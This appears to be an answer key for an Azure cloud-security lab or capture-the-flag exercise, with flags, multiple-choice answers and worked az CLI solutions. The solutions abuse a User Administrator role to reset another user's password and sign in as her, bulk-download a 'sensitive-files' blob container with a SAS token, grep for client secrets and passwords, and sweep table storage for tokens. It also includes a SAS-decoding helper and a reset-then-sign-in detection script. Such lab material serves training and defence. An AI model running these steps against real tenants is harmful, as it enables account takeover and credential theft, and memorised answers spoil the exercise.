SIMULATION
You've discovered that the compromised user holds directory-level privileges. Enumerate how this role can be abused to compromise another user in the directory. What is the Job Title attribute of the compromised target user?
Flag{92c8bfe4a73f48a6bd94e62fca2179dd}
Detailed Solution:
As the second compromised user, enumerate directory users:
az ad user list --output table
Use a cleaner query to show names, UPNs, and job titles:
az ad user list \
--query '[].{DisplayName:displayName,UPN:userPrincipalName,JobTitle:jobTitle}' \
--output table
You should identify a target user whose profile contains a flag in the jobTitle attribute.
The important target is:
lila.nguyen@azuresecops.onmicrosoft.com
Her jobTitle field contains:
Flag{92c8bfe4a73f48a6bd94e62fca2179dd}
Because the compromised user holds the User Administrator role, you can reset this target user's password and later authenticate as her.
Final Answer:
Flag{92c8bfe4a73f48a6bd94e62fca2179dd}
================
SIMULATION
Carefully enumerate the accessible Azure Blob Container to locate a file containing credentials for an App Registration within the tenant. What is the Application/Client ID of the discovered App Registration?
The answer is the clientId, appId, or applicationId value inside the credential file downloaded from the sensitive-files container.
Detailed Solution:
List blobs inside the accessible container:
az storage blob list \
--account-name excaliburstore \
--container-name sensitive-files \
--sas-token "$SAS" \
--query '[].name' \
--output table
Download all files locally:
mkdir blobloot
az storage blob download-batch \
--account-name excaliburstore \
--source sensitive-files \
--destination blobloot \
--sas-token "$SAS"
Search the downloaded files for application credentials:
grep -RniE 'clientId|appId|applicationId|clientSecret|tenantId|secret|password' blobloot
On Windows PowerShell:
Select-String -Path .\blobloot\* -Pattern 'clientId|appId|applicationId|clientSecret|tenantId|secret|password' -CaseSensitive:$false
A typical file may look like this:
{
'tenantId': 'f015f36d-c07f-41fb-9bde-fffc3a22ee8b',
'clientId': '
'clientSecret': '
}
The clientId / appId value is the answer.
Final Answer:
Use the clientId / appId value found in the blob credential file.
================
You find a SAS token in a table entity. The token starts with:
?sv=2025-01-05&ss=b&srt=sco&sp=rl&se=2026-08-01T00:00:00Z
Which permissions does sp=rl grant?
A. Read and List
B. Read and Write
C. Write and Delete
D. List and Delete
Detailed Solution:
In Azure Storage SAS tokens, sp means signed permissions.
For blob/container access:
r = read
l = list
w = write
d = delete
c = create
a = add
Given:
sp=rl
The permissions are:
Read + List
Correct answer:
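The same decoding applied to every policy field of the token, as an added example that is not part of the original solution. It goes beyond sp to cover ss, srt and se for an account SAS, which is what a reviewer needs to judge how much a leaked token exposes; the function name decode_sas and the output keys are assumptions made for this sketch.

```python
from datetime import datetime, timezone
from urllib.parse import parse_qs

# Permission letters as listed in the solution above
PERMS = {"r": "read", "l": "list", "w": "write", "d": "delete", "c": "create", "a": "add"}
SERVICES = {"b": "blob", "f": "file", "q": "queue", "t": "table"}
RESOURCE_TYPES = {"s": "service", "c": "container", "o": "object"}
MUTATING = {"write", "delete", "create", "add"}


def _expand(value, table):
    # Letters outside the table stay visible instead of being silently dropped
    return [table.get(ch, f"unknown({ch})") for ch in value]


def decode_sas(token, now=None):
    """Decode the policy fields of an account SAS query string (hypothetical helper)."""
    now = now or datetime.now(timezone.utc)
    fields = {k: v[0] for k, v in parse_qs(token.lstrip("?")).items()}
    missing = [k for k in ("sv", "sp", "se") if k not in fields]
    if missing:
        raise ValueError(f"not a usable SAS, missing fields: {missing}")
    expiry = datetime.fromisoformat(fields["se"].replace("Z", "+00:00"))
    if expiry.tzinfo is None:  # date-only expiry values carry no offset
        expiry = expiry.replace(tzinfo=timezone.utc)
    perms = _expand(fields["sp"], PERMS)
    return {
        "version": fields["sv"],
        "services": _expand(fields.get("ss", ""), SERVICES),
        "resource_types": _expand(fields.get("srt", ""), RESOURCE_TYPES),
        "permissions": perms,
        # Unknown letters are treated as potentially mutating
        "read_only": not (set(perms) & MUTATING)
        and not any(p.startswith("unknown") for p in perms),
        "expired": expiry <= now,
        "days_left": (expiry - now).days,
        "signed": "sig" in fields,
    }


if __name__ == "__main__":
    # Token prefix quoted in the question; the signature is not shown on the page
    sample = "?sv=2025-01-05&ss=b&srt=sco&sp=rl&se=2026-08-01T00:00:00Z"
    for key, value in decode_sas(sample).items():
        print(f"{key}: {value}")
```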
================
After authenticating as the service principal, enumerate its assigned Azure RBAC role. Which role does it have?
A. Reader
B. Contributor
C. Storage Account Contributor
D. Owner
Detailed Solution:
Resolve the service principal object ID:
az ad sp show \
--id c5fba7db-5e61-45bc-8944-3cd457bb19c2 \
--query id \
--output tsv
Then list role assignments:
SP_OBJECT_ID=$(az ad sp show \
--id c5fba7db-5e61-45bc-8944-3cd457bb19c2 \
--query id \
--output tsv)
az role assignment list \
--assignee "$SP_OBJECT_ID" \
--all \
--output table
Expected output:
Principal                             Role         Scope
------------------------------------  -----------  ----------------------------------------
<sp-object-id>                        Contributor  /subscriptions/5d8e44ac-...
Correct answer:
================
SIMULATION
Using the Azure access of the second compromised user, perform lateral movement within the environment to discover sensitive information. What is the flag uncovered during this activity?
The answer is the flag found after compromising the target user and enumerating her accessible Azure resources, usually storage/table data.
Detailed Solution:
Since the second compromised user is a User Administrator, abuse that role to reset the password of the target user.
az ad user update \
--id lila.nguyen@azuresecops.onmicrosoft.com \
--password 'NewP@ssw0rd12345!' \
--force-change-password-next-sign-in false
Now authenticate as the target user.
az login -u lila.nguyen@azuresecops.onmicrosoft.com -p 'NewP@ssw0rd12345!'
Confirm the login context:
az account show
Check what Azure resources this user can see:
az resource list --output table
Check role assignments:
az role assignment list --all --output table
If the user has storage data-plane permissions, enumerate storage accounts:
az storage account list --output table
If the storage account is known from the lab chain, use it directly:
az storage table list \
--account-name excaliburstore \
--auth-mode login \
--output table
Query each table:
az storage entity query \
--account-name excaliburstore \
--table-name <table-name> \
--auth-mode login \
--output json
A faster method:
for table in $(az storage table list --account-name excaliburstore --auth-mode login --query '[].name' -o tsv); do
echo "===== $table ====="
az storage entity query \
--account-name excaliburstore \
--table-name "$table" \
--auth-mode login \
--output table
done
Search the output for:
Flag
SAS
token
container
storage
secret
The flag discovered in this stage is the Q7 answer.
Final Answer:
Use the Flag{...} value returned from the accessible table/storage data after logging in as lila.nguyen@azuresecops.onmicrosoft.com.
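The reset-then-login step at the start of this chain leaves a correlated trail in the directory audit log and the sign-in log. The following is an added detection sketch, not part of the original solution: it pairs an admin-initiated reset with a successful sign-in by the reset account from the same IP address shortly afterwards. Field names follow the Microsoft Graph directoryAudit and signIn records; the activity names in RESET_ACTIVITIES, the function name and all sample records are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Assumption: activity names under which an admin-initiated reset is logged
RESET_ACTIVITIES = {"Reset user password", "Reset password (by admin)"}


def _ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def reset_then_signin(audit, signins, window=timedelta(hours=1)):
    """Find accounts that sign in from the resetting admin's IP address
    within `window` of an admin-initiated password reset."""
    findings = []
    for ev in audit:
        if ev["activityDisplayName"] not in RESET_ACTIVITIES or ev["result"] != "success":
            continue
        actor, reset_at = ev["initiatedBy"]["user"], _ts(ev["activityDateTime"])
        for target in ev["targetResources"]:
            upn = target["userPrincipalName"].lower()
            if upn == actor["userPrincipalName"].lower():
                continue  # a user changing their own password is not this pattern
            for s in signins:
                delay = _ts(s["createdDateTime"]) - reset_at
                if (s["userPrincipalName"].lower() == upn
                        and s["ipAddress"] == actor["ipAddress"]
                        and s["status"]["errorCode"] == 0
                        and timedelta(0) <= delay <= window):
                    findings.append({"admin": actor["userPrincipalName"], "target": upn,
                                     "ip": s["ipAddress"], "delay_s": int(delay.total_seconds())})
    return findings


def _reset(when, admin, ip, target):  # builds one constructed audit record
    return {"activityDisplayName": "Reset user password", "result": "success",
            "activityDateTime": when, "targetResources": [{"userPrincipalName": target}],
            "initiatedBy": {"user": {"userPrincipalName": admin, "ipAddress": ip}}}


def _signin(when, upn, ip, code=0):  # builds one constructed sign-in record
    return {"createdDateTime": when, "userPrincipalName": upn,
            "ipAddress": ip, "status": {"errorCode": code}}


# Constructed sample data (documentation IP ranges, example.test UPNs)
AUDIT = [_reset("2026-03-02T10:00:00Z", "useradmin@example.test", "203.0.113.10", "target@example.test"),
         _reset("2026-03-02T11:00:00Z", "helpdesk@example.test", "198.51.100.7", "staff@example.test")]
SIGNINS = [_signin("2026-03-02T10:04:30Z", "target@example.test", "203.0.113.10"),
           _signin("2026-03-02T11:20:00Z", "staff@example.test", "192.0.2.44")]

if __name__ == "__main__":
    for finding in reset_then_signin(AUDIT, SIGNINS):
        print(finding)
```

The helpdesk reset in the sample produces no finding because the user then signs in from a different address, which is the normal pattern for a legitimate reset.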
================